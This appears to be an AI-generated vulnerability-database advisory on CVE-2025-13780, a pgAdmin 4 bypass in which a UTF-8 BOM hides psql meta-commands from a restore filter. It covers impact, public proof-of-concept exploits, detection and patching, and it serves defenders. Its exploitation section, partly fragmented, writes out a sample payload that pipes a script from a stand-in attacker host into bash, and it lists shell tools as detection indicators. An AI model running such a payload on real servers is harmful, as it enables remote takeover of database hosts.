
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2025-13780 is a Remote Code Execution (RCE) vulnerability in pgAdmin 4 (versions up to and including 9.10) that allows authenticated low-privilege attackers to inject and execute arbitrary commands on the server hosting pgAdmin when it is running in server mode and performing restores from PLAIN-format dump files. The vulnerability was reported on November 18, 2025, and publicly disclosed on December 11, 2025, with a patch released in pgAdmin 4 version 9.11 (GitHub Advisory, Red Hat Bugzilla). It carries a CVSS v3.1 base score of 9.1 (Critical) per the GitHub Advisory Database, and 8.8 (High) per the NVD (GitHub Advisory).
CVE-2025-13780 is a bypass of the meta-command filter introduced to remediate the prior vulnerability CVE-2025-12762. The has_meta_commands() function in pgAdmin uses a regular expression to scan raw bytes for dangerous psql meta-commands (e.g., \!) in PLAIN-format SQL dump files before passing them to psql --file. However, the regex fails to account for files beginning with a UTF-8 Byte Order Mark (BOM: EF BB BF) or other special byte sequences — psql silently strips these bytes and then executes the embedded meta-command, resulting in OS command execution (GitHub Advisory, pgAdmin Issue #9368). The vulnerability is classified as CWE-88 (Argument Injection) and CWE-94 (Code Injection), and requires only low-privilege network access with no user interaction (GitHub Advisory). A technical write-up detailing the bypass mechanism was published by Endor Labs (Endor Labs).
Successful exploitation allows a low-privilege authenticated attacker to execute arbitrary OS commands on the server hosting pgAdmin, resulting in full compromise of confidentiality, integrity, and availability of the affected system (Red Hat Bugzilla). An attacker could exfiltrate sensitive database contents, modify or destroy data, install backdoors or malware, and use the compromised server as a pivot point for lateral movement within the network (GitHub Advisory). The scope is marked as Changed in the GitHub Advisory scoring, reflecting that the impact extends beyond the pgAdmin application itself to the underlying host operating system.
Multiple public proof-of-concept (PoC) exploits are available on GitHub, including repositories by zeropwn, meenakshisl, ThemeHackers, and Ashwesker, published as early as December 2025 (PoC - zeropwn, PoC - meenakshisl, PoC - ThemeHackers). As of the available intelligence, there is no confirmed evidence of in-the-wild exploitation or known threat actor attribution, though the availability of public PoCs significantly lowers the barrier to exploitation. The EPSS score is approximately 0.086–0.121%, and the vulnerability does not appear in the CISA KEV catalog at this time (GitHub Advisory).
EF BB BF) followed by a psql meta-command such as \! <OS_COMMAND> (e.g., \! curl http://attacker.com/shell.sh | bash). The BOM causes the has_meta_commands() regex filter to miss the meta-command.psql --file with the crafted file, psql strips the BOM and executes the embedded \! meta-command, running the attacker-controlled OS command as the pgAdmin server process user (GitHub Advisory, Endor Labs).curl/wget) following a restore operation.psql process invocations with --file arguments pointing to unusual or temporary file paths.EF BB BF) in pgAdmin upload or temporary directories; unexpected scripts, web shells, or binaries created in directories writable by the pgAdmin process user.psql process (e.g., /bin/sh, bash, curl, wget, python, nc) that are not part of normal database operations.The vulnerability is patched in pgAdmin 4 version 9.11, which corrects the has_meta_commands() filter to properly handle files with UTF-8 BOM and other special byte sequences (GitHub Advisory). All users running pgAdmin 4 in server mode should upgrade to version 9.11 or later immediately. As interim mitigations, restrict network access to the pgAdmin server to trusted networks only, limit which users have permission to perform restore operations, and monitor server logs for suspicious restore activity involving PLAIN-format dump files (Red Hat Bugzilla).
The vulnerability received notable coverage from security news outlets including GBHackers, CyberSecurityNews, SecurityOnline, and The Hacker News (in their weekly recap), highlighting the bypass of a prior fix as particularly concerning (GBHackers, SecurityOnline). Endor Labs published a detailed technical blog post explaining how the regex-based filter was insufficient and how the BOM bypass was discovered, crediting researchers zeropwn and Cycloctane (Endor Labs). The CVE appeared in multiple weekly trending CVE lists on Reddit's r/CVEWatch and was included in CISA's weekly vulnerability bulletin, reflecting broad community awareness.
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."